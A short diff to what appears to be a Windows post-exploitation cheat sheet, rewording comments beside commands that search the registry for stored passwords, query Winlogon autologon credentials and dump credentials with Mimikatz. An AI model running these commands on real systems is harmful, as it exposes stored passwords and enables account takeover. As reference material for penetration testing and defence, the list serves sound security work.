 reg query HKLM /f password /t REG_SZ /s

-reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" # autologon creds
+reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" # autologon credentials

-# Dump Windows credentials
+# Dump Windows credentials with Mimikatz (requires SYSTEM or admin)

 mimikatz.exe